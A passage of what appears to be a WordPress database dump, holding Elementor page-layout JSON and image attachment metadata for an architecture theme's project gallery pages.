projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3477,4809,'_elementor_page_assets','a:0:{}'),(3478,4810,'_wp_page_template','elementor_header_footer'),(3479,4810,'_elementor_edit_mode','builder'),(3480,4810,'_elementor_template_type','wp-page'),(3481,4810,'_elementor_version','3.6.6'),(3482,4810,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3483,4810,'_elementor_page_assets','a:0:{}'),(3484,4811,'_wp_page_template','elementor_header_footer'),(3485,4811,'_elementor_edit_mode','builder'),(3486,4811,'_elementor_template_type','wp-page'),(3487,4811,'_elementor_version','3.6.6'),(3488,4811,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbcb47e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6cbe328\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"},{\"id\":\"00d9390\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4800,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/Office-1.jpg\"},{\"id\":4801,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-2.jpg\"},{\"id\":4803,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-3.jpg\"},{\"id\":4804,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-4.jpg\"},{\"id\":4805,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-5.jpg\"},{\"id\":4806,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-6.jpg\"},{\"id\":4807,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-7.jpg\"},{\"id\":4808,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-8.jpeg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"17a02e1\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3489,4811,'_elementor_page_assets','a:0:{}'),(3490,4759,'_elementor_pro_version','3.8.1'),(3491,4812,'_wp_attached_file','2023/05/residential-1.jpg'),(3492,4812,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:782;s:4:\"file\";s:25:\"2023/05/residential-1.jpg\";s:8:\"filesize\";i:575832;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"residential-1-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30484;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20154;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"residential-1-768x601.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:601;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93701;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-1-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100215;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-1-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49519;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"residential-1-378x782.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:782;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70440;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"residential-1-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91550;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3493,4813,'_wp_attached_file','2023/05/residential-2.jpg'),(3494,4813,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:25:\"2023/05/residential-2.jpg\";s:8:\"filesize\";i:433215;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"residential-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19455;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13418;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"residential-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60256;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-2-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72475;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-2-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35193;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"residential-2-378x667.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:667;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49128;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"residential-2-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66249;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3495,4814,'_wp_attached_file','2023/05/residential-3.jpg'),(3496,4814,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1445;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2023/05/residential-3.jpg\";s:8:\"filesize\";i:827919;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"residential-3-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24878;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"residential-3-1024x709.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105556;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17386;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"residential-3-768x531.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69202;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-3-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80138;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-3-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39039;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"residential-3-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56209;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"residential-3-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72420;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3497,4815,'_wp_attached_file','2023/05/residential-4.jpg'),(3498,4815,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:25:\"2023/05/residential-4.jpg\";s:8:\"filesize\";i:450450;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"residential-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21913;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14609;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"residential-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67928;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-4-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80892;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-4-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37492;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"residential-4-378x667.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:667;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50345;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"residential-4-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73373;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3499,4816,'_wp_attached_file','2023/05/residential-5.jpg'),(3500,4816,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1457;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2023/05/residential-5.jpg\";s:8:\"filesize\";i:898807;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"residential-5-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21293;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"residential-5-1024x703.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106912;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14320;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"residential-5-768x527.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:527;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67839;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-5-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80019;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-5-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37046;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"residential-5-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48915;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"residential-5-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75531;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3501,4817,'_wp_attached_file','2023/05/residential-6.jpg'),(3502,4817,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"2023/05/residential-6.jpg\";s:8:\"filesize\";i:1027024;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"residential-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26822;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"residential-6-1024x819.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:819;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122163;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16704;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"residential-6-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80448;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-6-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83271;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-6-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41159;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"residential-6-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46376;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"residential-6-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3503,4818,'_wp_attached_file','2023/05/residential-7.jpg'),(3504,4818,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"2023/05/residential-7.jpg\";s:8:\"filesize\";i:1065382;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"residential-7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26174;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"residential-7-1024x819.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:819;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117089;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16624;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"residential-7-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76951;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-7-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80550;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:25:\"residential-7-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39918;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:25:\"residential-7-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50644;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:25:\"residential-7-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75264;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3505,4819,'_wp_page_template','elementor_header_footer'),(3506,4819,'_elementor_edit_mode','builder'),(3507,4819,'_elementor_template_type','wp-page'),(3508,4819,'_elementor_version','3.6.6'),(3509,4819,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3510,4819,'_elementor_page_assets','a:0:{}'),(3511,4819,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3512,4820,'_wp_page_template','elementor_header_footer'),(3513,4820,'_elementor_edit_mode','builder'),(3514,4820,'_elementor_template_type','wp-page'),(3515,4820,'_elementor_version','3.6.6'),(3516,4820,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(3517,4820,'_elementor_page_assets','a:0:{}'),(3518,4820,'_elementor_css','a:6:{s:4:\"time\";i:1668397356;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3519,4821,'_wp_page_template','elementor_header_footer'),(3520,4821,'_elementor_edit_mode','builder'),(3521,4821,'_elementor_template_type','wp-page'),(3522,4821,'_elementor_version','3.6.6'),(3523,4821,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding 